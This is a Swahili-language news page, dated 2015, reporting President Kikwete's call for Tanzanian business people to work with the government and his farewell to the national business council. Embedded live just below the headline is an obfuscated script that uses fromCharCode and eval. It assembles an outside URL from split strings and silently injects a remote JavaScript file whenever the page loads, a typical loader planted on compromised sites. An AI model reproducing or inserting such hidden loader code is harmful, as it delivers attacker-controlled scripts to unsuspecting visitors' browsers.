Recent Comments

Wafanyabiashara shirikisheni serikali acheni kulaumu

By Baraka Bitariho Sep 4, 2015
<p>Wafanyabiashara shirikisheni serikali acheni kulaumu </p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

RAIS Jakaya Kikwete aimeitaka jamii ya wafanyabiashara nchini kuacha kulaumu na badala yake wanatakiwa kuihusisha serikali katika mijadala yenye tija yenye lengo la kukabiliana na changamoto za mazingira ya biashara.

Aidha, ametumia fursa hiyo kuwaaga wajumbe wa Mkutano wa Baraza la Taifa la Biashara (TNBC) na kueleza imani yake kuwa rais ajaye ataendeleza misingi na mipango iliyowekwa.

Akizungumza jana jijini Dar es Salaam wakati wa uzinduzi wa mkutano wa TNBC, Kikwete alisema serikali yake iliweka milango wazi kwa majadiliano yenye tija na sekta binafsi katika suala zima la kuweka mazingira mazuri ya biashara.

“Ombi langu ni kuwa tunapaswa kuendelea kufanya kazi kwa pamoja kama washirika kuliko kama maadui au wanaopinga.”

Alisema juhudi za kuwapo kwa mijadala yenye tija kumesaidia Serikali kuboresha mazingira kwa ajili ya wajasiriamali na wafanyabiashara ndogo ndogo mafanikio ambayo ni dhahiri.

Alisema serikali yake imejikita katika kutekeleza katika maeneo sita muhimu yaliyobainishwa na wadau ambayo ni upatikanaji wa ardhi na usalama, kodi na msululu wa kodi, kupambana na rushwa, sheria za kazi, utekelezaji wa mkataba, sheria na taratibu.

Aidha, Kikwete ametumia nafasi hiyo kuwaaga wanachama wa baraza hilo ambalo yeye ni Mwenyekiti. Kikwete alitumia nafasi hiyo kuwataka sekta binafsi kuendelea kushirikiana na uongozi ujao na kuwa ana imani kuwa rais ajaye ataendeleza mipango mingi iliyowekwa na kutekeleza.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com